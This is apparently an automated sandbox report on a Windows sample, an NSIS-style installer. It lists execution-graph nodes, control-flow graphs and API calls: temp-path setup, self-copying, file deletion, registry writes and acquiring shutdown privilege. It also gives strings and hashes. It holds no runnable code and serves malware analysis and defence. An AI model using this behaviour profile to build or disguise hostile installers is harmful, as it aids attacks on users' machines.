                                                  Total number of Nodes:1549
                                                  Total number of Limit Nodes:45
                                                  execution_graph 4922 10001000 4925 1000101b 4922->4925 4926 10001516 GlobalFree 4925->4926 4927 10001020 4926->4927 4928 10001024 4927->4928 4929 10001027 GlobalAlloc 4927->4929 4930 1000153d 3 API calls 4928->4930 4929->4928 4931 10001019 4930->4931 3894 401941 3895 401943 3894->3895 3896 402c37 17 API calls 3895->3896 3897 401948 3896->3897 3900 405990 3897->3900 3939 405c5b 3900->3939 3903 4059b8 DeleteFileW 3905 401951 3903->3905 3904 4059cf 3906 405aef 3904->3906 3953 406282 lstrcpynW 3904->3953 3906->3905 3971 4065c5 FindFirstFileW 3906->3971 3908 4059f5 3909 405a08 3908->3909 3910 4059fb lstrcatW 3908->3910 3954 405b9f lstrlenW 3909->3954 3911 405a0e 3910->3911 3915 405a1e lstrcatW 3911->3915 3917 405a29 lstrlenW FindFirstFileW 3911->3917 3915->3917 3916 405b18 3974 405b53 lstrlenW CharPrevW 3916->3974 3917->3906 3924 405a4b 3917->3924 3920 405ad2 FindNextFileW 3920->3924 3925 405ae8 FindClose 3920->3925 3921 405948 5 API calls 3923 405b2a 3921->3923 3926 405b44 3923->3926 3927 405b2e 3923->3927 3924->3920 3933 405a93 3924->3933 3958 406282 lstrcpynW 3924->3958 3925->3906 3929 4052e6 24 API calls 3926->3929 3927->3905 3930 4052e6 24 API calls 3927->3930 3929->3905 3932 405b3b 3930->3932 3931 405990 60 API calls 3931->3933 3935 406048 36 API calls 3932->3935 3933->3920 3933->3931 3934 4052e6 24 API calls 3933->3934 3936 4052e6 24 API calls 3933->3936 3959 405948 3933->3959 3967 406048 MoveFileExW 3933->3967 3934->3920 3937 405b42 3935->3937 3936->3933 3937->3905 3977 406282 lstrcpynW 3939->3977 3941 405c6c 3978 405bfe CharNextW CharNextW 3941->3978 3944 4059b0 3944->3903 3944->3904 3945 406516 5 API calls 3951 405c82 3945->3951 3946 405cb3 lstrlenW 3947 405cbe 3946->3947 3946->3951 3949 405b53 3 API calls 3947->3949 3948 4065c5 2 API calls 3948->3951 3950 405cc3 GetFileAttributesW 3949->3950 3950->3944 3951->3944 3951->3946 3951->3948 3952 405b9f 2 API calls 3951->3952 3952->3946 3953->3908 3955 405bad 
3954->3955 3956 405bb3 CharPrevW 3955->3956 3957 405bbf 3955->3957 3956->3955 3956->3957 3957->3911 3958->3924 3984 405d4f GetFileAttributesW 3959->3984 3962 405975 3962->3933 3963 405963 RemoveDirectoryW 3965 405971 3963->3965 3964 40596b DeleteFileW 3964->3965 3965->3962 3966 405981 SetFileAttributesW 3965->3966 3966->3962 3968 406069 3967->3968 3969 40605c 3967->3969 3968->3933 3987 405ece 3969->3987 3972 405b14 3971->3972 3973 4065db FindClose 3971->3973 3972->3905 3972->3916 3973->3972 3975 405b1e 3974->3975 3976 405b6f lstrcatW 3974->3976 3975->3921 3976->3975 3977->3941 3979 405c1b 3978->3979 3983 405c2d 3978->3983 3981 405c28 CharNextW 3979->3981 3979->3983 3980 405c51 3980->3944 3980->3945 3981->3980 3982 405b80 CharNextW 3982->3983 3983->3980 3983->3982 3985 405d61 SetFileAttributesW 3984->3985 3986 405954 3984->3986 3985->3986 3986->3962 3986->3963 3986->3964 3988 405f24 GetShortPathNameW 3987->3988 3989 405efe 3987->3989 3990 406043 3988->3990 3991 405f39 3988->3991 4014 405d74 GetFileAttributesW CreateFileW 3989->4014 3990->3968 3991->3990 3993 405f41 wsprintfA 3991->3993 3995 4062a4 17 API calls 3993->3995 3994 405f08 CloseHandle GetShortPathNameW 3994->3990 3996 405f1c 3994->3996 3997 405f69 3995->3997 3996->3988 3996->3990 4015 405d74 GetFileAttributesW CreateFileW 3997->4015 3999 405f76 3999->3990 4000 405f85 GetFileSize GlobalAlloc 3999->4000 4001 405fa7 4000->4001 4002 40603c CloseHandle 4000->4002 4016 405df7 ReadFile 4001->4016 4002->3990 4007 405fc6 lstrcpyA 4010 405fe8 4007->4010 4008 405fda 4009 405cd9 4 API calls 4008->4009 4009->4010 4011 40601f SetFilePointer 4010->4011 4023 405e26 WriteFile 4011->4023 4014->3994 4015->3999 4017 405e15 4016->4017 4017->4002 4018 405cd9 lstrlenA 4017->4018 4019 405d1a lstrlenA 4018->4019 4020 405d22 4019->4020 4021 405cf3 lstrcmpiA 4019->4021 4020->4007 4020->4008 4021->4020 4022 405d11 CharNextA 4021->4022 4022->4019 4024 405e44 GlobalFree 4023->4024 4024->4002 4025 4015c1 4026 402c37 17 API calls 
4025->4026 4027 4015c8 4026->4027 4028 405bfe 4 API calls 4027->4028 4040 4015d1 4028->4040 4029 401631 4031 401663 4029->4031 4032 401636 4029->4032 4030 405b80 CharNextW 4030->4040 4034 401423 24 API calls 4031->4034 4052 401423 4032->4052 4041 40165b 4034->4041 4039 40164a SetCurrentDirectoryW 4039->4041 4040->4029 4040->4030 4042 401617 GetFileAttributesW 4040->4042 4044 40584f 4040->4044 4047 4057b5 CreateDirectoryW 4040->4047 4056 405832 CreateDirectoryW 4040->4056 4042->4040 4059 40665c GetModuleHandleA 4044->4059 4048 405802 4047->4048 4049 405806 GetLastError 4047->4049 4048->4040 4049->4048 4050 405815 SetFileSecurityW 4049->4050 4050->4048 4051 40582b GetLastError 4050->4051 4051->4048 4053 4052e6 24 API calls 4052->4053 4054 401431 4053->4054 4055 406282 lstrcpynW 4054->4055 4055->4039 4057 405842 4056->4057 4058 405846 GetLastError 4056->4058 4057->4040 4058->4057 4060 406682 GetProcAddress 4059->4060 4061 406678 4059->4061 4064 405856 4060->4064 4065 4065ec GetSystemDirectoryW 4061->4065 4063 40667e 4063->4060 4063->4064 4064->4040 4066 40660e wsprintfW LoadLibraryExW 4065->4066 4066->4063 4181 401e43 4189 402c15 4181->4189 4183 401e49 4184 402c15 17 API calls 4183->4184 4185 401e55 4184->4185 4186 401e61 ShowWindow 4185->4186 4187 401e6c EnableWindow 4185->4187 4188 402abf 4186->4188 4187->4188 4190 4062a4 17 API calls 4189->4190 4191 402c2a 4190->4191 4191->4183 4192 402644 4193 402c15 17 API calls 4192->4193 4201 402653 4193->4201 4194 402790 4195 40269d ReadFile 4195->4194 4195->4201 4196 402736 4196->4194 4196->4201 4206 405e55 SetFilePointer 4196->4206 4197 405df7 ReadFile 4197->4201 4199 402792 4215 4061c9 wsprintfW 4199->4215 4200 4026dd MultiByteToWideChar 4200->4201 4201->4194 4201->4195 4201->4196 4201->4197 4201->4199 4201->4200 4203 402703 SetFilePointer MultiByteToWideChar 4201->4203 4204 4027a3 4201->4204 4203->4201 4204->4194 4205 4027c4 SetFilePointer 4204->4205 4205->4194 4207 405e71 4206->4207 4212 405e8d 4206->4212 4208 405df7 
ReadFile 4207->4208 4209 405e7d 4208->4209 4210 405e96 SetFilePointer 4209->4210 4211 405ebe SetFilePointer 4209->4211 4209->4212 4210->4211 4213 405ea1 4210->4213 4211->4212 4212->4196 4214 405e26 WriteFile 4213->4214 4214->4212 4215->4194 4226 402348 4227 402c37 17 API calls 4226->4227 4228 402357 4227->4228 4229 402c37 17 API calls 4228->4229 4230 402360 4229->4230 4231 402c37 17 API calls 4230->4231 4232 40236a GetPrivateProfileStringW 4231->4232 4935 4016cc 4936 402c37 17 API calls 4935->4936 4937 4016d2 GetFullPathNameW 4936->4937 4938 40170e 4937->4938 4939 4016ec 4937->4939 4940 401723 GetShortPathNameW 4938->4940 4941 402abf 4938->4941 4939->4938 4942 4065c5 2 API calls 4939->4942 4940->4941 4943 4016fe 4942->4943 4943->4938 4945 406282 lstrcpynW 4943->4945 4945->4938 4946 401b4d 4947 402c37 17 API calls 4946->4947 4948 401b54 4947->4948 4949 402c15 17 API calls 4948->4949 4950 401b5d wsprintfW 4949->4950 4951 402abf 4950->4951 4952 40394e 4953 403959 4952->4953 4954 403960 GlobalAlloc 4953->4954 4955 40395d 4953->4955 4954->4955 4956 401f52 4957 402c37 17 API calls 4956->4957 4958 401f59 4957->4958 4959 4065c5 2 API calls 4958->4959 4960 401f5f 4959->4960 4962 401f70 4960->4962 4963 4061c9 wsprintfW 4960->4963 4963->4962 4964 402253 4965 402c37 17 API calls 4964->4965 4966 402259 4965->4966 4967 402c37 17 API calls 4966->4967 4968 402262 4967->4968 4969 402c37 17 API calls 4968->4969 4970 40226b 4969->4970 4971 4065c5 2 API calls 4970->4971 4972 402274 4971->4972 4973 402285 lstrlenW lstrlenW 4972->4973 4977 402278 4972->4977 4974 4052e6 24 API calls 4973->4974 4976 4022c3 SHFileOperationW 4974->4976 4975 4052e6 24 API calls 4978 402280 4975->4978 4976->4977 4976->4978 4977->4975 4979 401956 4980 402c37 17 API calls 4979->4980 4981 40195d lstrlenW 4980->4981 4982 40258c 4981->4982 4983 4014d7 4984 402c15 17 API calls 4983->4984 4985 4014dd Sleep 4984->4985 4987 402abf 4985->4987 4988 4022d7 4989 4022de 4988->4989 4993 4022f1 4988->4993 4990 4062a4 17 API 
calls 4989->4990 4991 4022eb 4990->4991 4992 4058e4 MessageBoxIndirectW 4991->4992 4992->4993 4994 401d57 GetDlgItem GetClientRect 4995 402c37 17 API calls 4994->4995 4996 401d89 LoadImageW SendMessageW 4995->4996 4997 401da7 DeleteObject 4996->4997 4998 402abf 4996->4998 4997->4998 4999 402dd7 5000 402e02 4999->5000 5001 402de9 SetTimer 4999->5001 5002 402e57 5000->5002 5003 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5000->5003 5001->5000 5003->5002 4776 40525a 4777 40526a 4776->4777 4778 40527e 4776->4778 4779 405270 4777->4779 4789 4052c7 4777->4789 4780 405286 IsWindowVisible 4778->4780 4784 4052a6 4778->4784 4782 404263 SendMessageW 4779->4782 4783 405293 4780->4783 4780->4789 4781 4052cc CallWindowProcW 4785 40527a 4781->4785 4782->4785 4786 404bb0 5 API calls 4783->4786 4784->4781 4788 404c30 4 API calls 4784->4788 4787 40529d 4786->4787 4787->4784 4788->4789 4789->4781 4790 1000101b 4797 10001516 4790->4797 4792 10001020 4793 10001024 4792->4793 4794 10001027 GlobalAlloc 4792->4794 4795 1000153d 3 API calls 4793->4795 4794->4793 4796 1000103b 4795->4796 4799 1000151c 4797->4799 4798 10001522 4798->4792 4799->4798 4800 1000152e GlobalFree 4799->4800 4800->4792 4801 40175c 4802 402c37 17 API calls 4801->4802 4803 401763 4802->4803 4804 405da3 2 API calls 4803->4804 4805 40176a 4804->4805 4806 405da3 2 API calls 4805->4806 4806->4805 4807 4023de 4808 402c37 17 API calls 4807->4808 4809 4023f0 4808->4809 4810 402c37 17 API calls 4809->4810 4811 4023fa 4810->4811 4824 402cc7 4811->4824 4814 402432 4815 40243e 4814->4815 4818 402c15 17 API calls 4814->4818 4819 40245d RegSetValueExW 4815->4819 4821 4030fa 31 API calls 4815->4821 4816 402885 4817 402c37 17 API calls 4820 402428 lstrlenW 4817->4820 4818->4815 4822 402473 RegCloseKey 4819->4822 4820->4814 4821->4819 4822->4816 4825 402ce2 4824->4825 4828 40611d 4825->4828 4829 40612c 4828->4829 4830 40240a 4829->4830 4831 406137 RegCreateKeyExW 4829->4831 4830->4814 4830->4816 4830->4817 4831->4830 4068 
404c62 GetDlgItem GetDlgItem 4069 404cb4 7 API calls 4068->4069 4077 404ecd 4068->4077 4070 404d57 DeleteObject 4069->4070 4071 404d4a SendMessageW 4069->4071 4072 404d60 4070->4072 4071->4070 4073 404d6f 4072->4073 4074 404d97 4072->4074 4075 4062a4 17 API calls 4073->4075 4124 404217 4074->4124 4080 404d79 SendMessageW SendMessageW 4075->4080 4076 404f92 4086 404fb1 4076->4086 4088 404fa3 SendMessageW 4076->4088 4077->4076 4083 404f2d 4077->4083 4077->4086 4079 40505d 4081 405067 SendMessageW 4079->4081 4082 40506f 4079->4082 4080->4072 4081->4082 4093 405081 ImageList_Destroy 4082->4093 4094 405088 4082->4094 4104 405098 4082->4104 4129 404bb0 SendMessageW 4083->4129 4084 404dab 4090 404217 18 API calls 4084->4090 4085 405245 4146 40427e 4085->4146 4086->4079 4086->4085 4091 40500a SendMessageW 4086->4091 4088->4086 4110 404db9 4090->4110 4091->4085 4095 40501f SendMessageW 4091->4095 4093->4094 4097 405091 GlobalFree 4094->4097 4094->4104 4099 405032 4095->4099 4096 405207 4096->4085 4100 405219 ShowWindow GetDlgItem ShowWindow 4096->4100 4097->4104 4098 404e8e GetWindowLongW SetWindowLongW 4101 404ea7 4098->4101 4105 405043 SendMessageW 4099->4105 4100->4085 4102 404ec5 4101->4102 4103 404ead ShowWindow 4101->4103 4128 40424c SendMessageW 4102->4128 4127 40424c SendMessageW 4103->4127 4104->4096 4119 4050d3 4104->4119 4134 404c30 4104->4134 4105->4079 4106 404e88 4106->4098 4106->4101 4109 404f3e 4109->4076 4110->4098 4110->4106 4111 404e09 SendMessageW 4110->4111 4112 404e45 SendMessageW 4110->4112 4113 404e56 SendMessageW 4110->4113 4111->4110 4112->4110 4113->4110 4115 404ec0 4115->4085 4116 4051dd InvalidateRect 4116->4096 4117 4051f3 4116->4117 4143 404b6b 4117->4143 4118 405101 SendMessageW 4120 405117 4118->4120 4119->4118 4119->4120 4120->4116 4121 405178 4120->4121 4123 40518b SendMessageW SendMessageW 4120->4123 4121->4123 4123->4120 4125 4062a4 17 API calls 4124->4125 4126 404222 SetDlgItemTextW 4125->4126 4126->4084 4127->4115 4128->4077 4130 
404bd3 GetMessagePos ScreenToClient SendMessageW 4129->4130 4131 404c0f SendMessageW 4129->4131 4132 404c07 4130->4132 4133 404c0c 4130->4133 4131->4132 4132->4109 4133->4131 4160 406282 lstrcpynW 4134->4160 4136 404c43 4161 4061c9 wsprintfW 4136->4161 4138 404c4d 4162 40140b 4138->4162 4142 404c5d 4142->4119 4170 404aa2 4143->4170 4145 404b80 4145->4096 4147 404296 GetWindowLongW 4146->4147 4148 40431f 4146->4148 4147->4148 4149 4042a7 4147->4149 4150 4042b6 GetSysColor 4149->4150 4151 4042b9 4149->4151 4150->4151 4152 4042c9 SetBkMode 4151->4152 4153 4042bf SetTextColor 4151->4153 4154 4042e1 GetSysColor 4152->4154 4155 4042e7 4152->4155 4153->4152 4154->4155 4156 4042f8 4155->4156 4157 4042ee SetBkColor 4155->4157 4156->4148 4158 404312 CreateBrushIndirect 4156->4158 4159 40430b DeleteObject 4156->4159 4157->4156 4158->4148 4159->4158 4160->4136 4161->4138 4166 401389 4162->4166 4165 406282 lstrcpynW 4165->4142 4168 401390 4166->4168 4167 4013fe 4167->4165 4168->4167 4169 4013cb MulDiv SendMessageW 4168->4169 4169->4168 4171 404abb 4170->4171 4172 4062a4 17 API calls 4171->4172 4173 404b1f 4172->4173 4174 4062a4 17 API calls 4173->4174 4175 404b2a 4174->4175 4176 4062a4 17 API calls 4175->4176 4177 404b40 lstrlenW wsprintfW SetDlgItemTextW 4176->4177 4177->4145 5004 402862 5005 402c37 17 API calls 5004->5005 5006 402869 FindFirstFileW 5005->5006 5007 402891 5006->5007 5008 40287c 5006->5008 5012 4061c9 wsprintfW 5007->5012 5010 40289a 5013 406282 lstrcpynW 5010->5013 5012->5010 5013->5008 5014 401563 5015 402a65 5014->5015 5018 4061c9 wsprintfW 5015->5018 5017 402a6a 5018->5017 5019 404365 lstrlenW 5020 404384 5019->5020 5021 404386 WideCharToMultiByte 5019->5021 5020->5021 5022 4046e6 5023 404712 5022->5023 5024 404723 5022->5024 5083 4058c8 GetDlgItemTextW 5023->5083 5025 40472f GetDlgItem 5024->5025 5028 40478e 5024->5028 5027 404743 5025->5027 5032 404757 SetWindowTextW 5027->5032 5035 405bfe 4 API calls 5027->5035 5029 404872 5028->5029 5037 4062a4 17 API 

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403373-4033b0 SetErrorMode GetVersion 1 4033b2-4033ba call 40665c 0->1 2 4033c3 0->2 1->2 7 4033bc 1->7 3 4033c8-4033dc call 4065ec lstrlenA 2->3 9 4033de-4033fa call 40665c * 3 3->9 7->2 16 40340b-40346c #17 OleInitialize SHGetFileInfoW call 406282 GetCommandLineW call 406282 GetModuleHandleW 9->16 17 4033fc-403402 9->17 24 403476-403490 call 405b80 CharNextW 16->24 25 40346e-403475 16->25 17->16 21 403404 17->21 21->16 28 403496-40349c 24->28 29 4035a7-4035c1 GetTempPathW call 403342 24->29 25->24 31 4034a5-4034a9 28->31 32 40349e-4034a3 28->32 36 4035c3-4035e1 GetWindowsDirectoryW lstrcatW call 403342 29->36 37 403619-403633 DeleteFileW call 402ec1 29->37 34 4034b0-4034b4 31->34 35 4034ab-4034af 31->35 32->31 32->32 38 403573-403580 call 405b80 34->38 39 4034ba-4034c0 34->39 35->34 36->37 54 4035e3-403613 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403342 36->54 57 4036e4-4036f4 call 4038b6 OleUninitialize 37->57 58 403639-40363f 37->58 55 403582-403583 38->55 56 403584-40358a 38->56 40 4034c2-4034ca 39->40 41 4034db-403514 39->41 45 4034d1 40->45 46 4034cc-4034cf 40->46 47 403531-40356b 41->47 48 403516-40351b 41->48 45->41 46->41 46->45 47->38 53 40356d-403571 47->53 48->47 52 40351d-403525 48->52 62 403527-40352a 52->62 63 40352c 52->63 53->38 64 403592-4035a0 call 406282 53->64 54->37 54->57 55->56 56->28 66 403590 56->66 75 40381a-403820 57->75 76 4036fa-40370a call 4058e4 ExitProcess 57->76 59 4036d4-4036db call 403990 58->59 60 403645-403650 call 405b80 58->60 74 4036e0 59->74 77 403652-403687 60->77 78 40369e-4036a8 60->78 62->47 62->63 63->47 67 4035a5 64->67 66->67 67->29 74->57 80 403822-403838 GetCurrentProcess OpenProcessToken 75->80 81 40389e-4038a6 75->81 82 403689-40368d 77->82 85 403710-403724 call 40584f lstrcatW 78->85 86 4036aa-4036b8 call 405c5b 78->86 88 40383a-403868 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40386e-40387c call 40665c 80->89 83 
4038a8 81->83 84 4038ac-4038b0 ExitProcess 81->84 90 403696-40369a 82->90 91 40368f-403694 82->91 83->84 102 403731-40374b lstrcatW lstrcmpiW 85->102 103 403726-40372c lstrcatW 85->103 86->57 101 4036ba-4036d0 call 406282 * 2 86->101 88->89 99 40388a-403895 ExitWindowsEx 89->99 100 40387e-403888 89->100 90->82 96 40369c 90->96 91->90 91->96 96->78 99->81 104 403897-403899 call 40140b 99->104 100->99 100->104 101->59 102->57 106 40374d-403750 102->106 103->102 104->81 107 403752-403757 call 4057b5 106->107 108 403759 call 405832 106->108 117 40375e-40376c SetCurrentDirectoryW 107->117 108->117 118 403779-4037a2 call 406282 117->118 119 40376e-403774 call 406282 117->119 123 4037a7-4037c3 call 4062a4 DeleteFileW 118->123 119->118 126 403804-40380c 123->126 127 4037c5-4037d5 CopyFileW 123->127 126->123 128 40380e-403815 call 406048 126->128 127->126 129 4037d7-4037f7 call 406048 call 4062a4 call 405867 127->129 128->57 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403396
                                                  • GetVersion.KERNEL32 ref: 0040339C
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                  • OleInitialize.OLE32(00000000), ref: 00403413
                                                  • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                  • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                    • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                    • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                    • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                  • ExitProcess.KERNEL32 ref: 0040370A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                  • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\3507071243740008011.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                  • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                  • ExitProcess.KERNEL32 ref: 004038B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 2488574733-1263452082
                                                  • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                  • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                  • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                  • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 139 404c62-404cae GetDlgItem * 2 140 404cb4-404d48 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ecf-404ed6 139->141 142 404d57-404d5e DeleteObject 140->142 143 404d4a-404d55 SendMessageW 140->143 144 404ed8-404ee8 141->144 145 404eea 141->145 147 404d60-404d68 142->147 143->142 146 404eed-404ef6 144->146 145->146 148 404f01-404f07 146->148 149 404ef8-404efb 146->149 150 404d91-404d95 147->150 151 404d6a-404d6d 147->151 155 404f16-404f1d 148->155 156 404f09-404f10 148->156 149->148 152 404fe5-404fec 149->152 150->147 157 404d97-404dc3 call 404217 * 2 150->157 153 404d72-404d8f call 4062a4 SendMessageW * 2 151->153 154 404d6f 151->154 162 40505d-405065 152->162 163 404fee-404ff4 152->163 153->150 154->153 159 404f92-404f95 155->159 160 404f1f-404f22 155->160 156->152 156->155 196 404dc9-404dcf 157->196 197 404e8e-404ea1 GetWindowLongW SetWindowLongW 157->197 159->152 164 404f97-404fa1 159->164 168 404f24-404f2b 160->168 169 404f2d-404f42 call 404bb0 160->169 166 405067-40506d SendMessageW 162->166 167 40506f-405076 162->167 171 405245-405257 call 40427e 163->171 172 404ffa-405004 163->172 174 404fb1-404fbb 164->174 175 404fa3-404faf SendMessageW 164->175 166->167 176 405078-40507f 167->176 177 4050aa-4050b1 167->177 168->159 168->169 169->159 195 404f44-404f55 169->195 172->171 180 40500a-405019 SendMessageW 172->180 174->152 182 404fbd-404fc7 174->182 175->174 183 405081-405082 ImageList_Destroy 176->183 184 405088-40508f 176->184 187 405207-40520e 177->187 188 4050b7-4050c3 call 4011ef 177->188 180->171 189 40501f-405030 SendMessageW 180->189 191 404fd8-404fe2 182->191 192 404fc9-404fd6 182->192 183->184 193 405091-405092 GlobalFree 184->193 194 405098-4050a4 184->194 187->171 190 405210-405217 187->190 214 4050d3-4050d6 188->214 215 4050c5-4050c8 188->215 199 405032-405038 189->199 200 40503a-40503c 189->200 190->171 202 
405219-405243 ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->194 194->177 195->159 204 404f57-404f59 195->204 205 404dd2-404dd9 196->205 203 404ea7-404eab 197->203 199->200 201 40503d-405056 call 401299 SendMessageW 199->201 200->201 201->162 202->171 208 404ec5-404ecd call 40424c 203->208 209 404ead-404ec0 ShowWindow call 40424c 203->209 210 404f5b-404f62 204->210 211 404f6c 204->211 212 404e6f-404e82 205->212 213 404ddf-404e07 205->213 208->141 209->171 224 404f64-404f66 210->224 225 404f68-404f6a 210->225 228 404f6f-404f8b call 40117d 211->228 212->205 219 404e88-404e8c 212->219 226 404e41-404e43 213->226 227 404e09-404e3f SendMessageW 213->227 220 405117-40513b call 4011ef 214->220 221 4050d8-4050f1 call 4012e2 call 401299 214->221 216 4050ca 215->216 217 4050cb-4050ce call 404c30 215->217 216->217 217->214 219->197 219->203 241 405141 220->241 242 4051dd-4051f1 InvalidateRect 220->242 246 405101-405110 SendMessageW 221->246 247 4050f3-4050f9 221->247 224->228 225->228 229 404e45-404e54 SendMessageW 226->229 230 404e56-404e6c SendMessageW 226->230 227->212 228->159 229->212 230->212 243 405144-40514f 241->243 242->187 245 4051f3-405202 call 404b83 call 404b6b 242->245 248 405151-405160 243->248 249 4051c5-4051d7 243->249 245->187 246->220 253 4050fb 247->253 254 4050fc-4050ff 247->254 251 405162-40516f 248->251 252 405173-405176 248->252 249->242 249->243 251->252 256 405178-40517b 252->256 257 40517d-405186 252->257 253->254 254->246 254->247 259 40518b-4051c3 SendMessageW * 2 256->259 257->259 260 405188 257->260 259->249 260->259
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
